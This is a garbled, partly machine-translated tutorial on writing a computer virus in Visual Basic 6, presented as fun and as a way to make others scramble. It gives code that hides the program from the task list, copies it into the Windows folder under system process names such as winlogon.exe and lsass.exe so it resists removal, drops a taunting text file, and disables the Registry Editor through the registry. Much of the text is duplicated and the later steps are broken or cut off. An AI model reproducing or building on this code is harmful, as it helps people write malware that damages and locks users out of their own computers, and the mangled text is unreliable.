Actually it's fun to make a virus, especially if we get can make others scramble for the virus that we make. I want to share a little knowledge about how to make a virus nih with VB 6. This material is only to try it or any other word is still the basis. You may be able to develop it themselves. Oh yes, I have also included an example of a virus that had I made her name r3d_94l4xy. For heavier material that will be connected later. For those who want to get a certain virus samples with source code please contact Johan.
First, make a form for a virus you just use standard Exe
First, make a form for a virus you just use standard Exe
Curing Form
Private Sub Form_Load()
App.TaskVisible = False
End Sub
App.TaskVisible = False
End Sub
Meng reproduce or Self-Copy
Misalnya mau di-copy kan ke direktori C:\Windows dengan nama winlogon.exe csrss.exe ato services.exe
biar prosesnya sulit di kill pake taskmanager, nama virus pake nama system pada windows
biar prosesnya sulit di kill pake taskmanager, nama virus pake nama system pada windows
On Error Resume Next
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\winlogon.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\csrss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\services.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\smss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\lsass.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\winlogon.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\csrss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\services.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\smss.exe”
FileCopy App.EXEName + “.exe”, “C:\WINDOWS\lsass.exe”
3. create a directory or folder
For example make a folder in windows directory
For example make a folder in windows directory
On Error Resume Next
MkDir “C:\WINDOWS\virus”
MkDir “C:\WINDOWS\virus”
5. Make Message Virus
Make use message text file
On Error Resume Next
Make use message text file
On Error Resume Next
Set bikinpesen = CreateObject ("Scripting.FileSystemObject")
Set isipesen = bikinpesen.Createtextfile ("C: \ read saya.txt")
isipesen.writeline ("computer virus you fool")
6. Registry change
For example m
want to disable regedit
On Error Resume Next
Set ubahreg = CreateObject ("WScript.Shell")
ubahreg.regwrite "HKEY_CURRENT_USER \ Software \
microsoft \ windows \ CurrentVersion \ Policies \ system \
DisableRegistryTools ", 1," REG_DWORD "
7. Deleting Registry
For example, would remove the
On Error Resume Next
Set ubahreg = CreateObject ("WScript.Shell")
ubahreg.regwrite "HKEY_CURRENT_USER \ Software \
microsoft \ windows \ CurrentVersion \ Policies \ system \
DisableRegistryTools ", 1," REG_DWORD "
7. Deleting Registry
For example, would remove the
Software \ Microsoft \ Windows NT \ CurrentVersion \ Run \ ServLogon
Software \ Microsoft \ Windows NT \ CurrentVersion \ Run \ ServLogon
wah kayaknya mantab nih....tes dulu ahk.........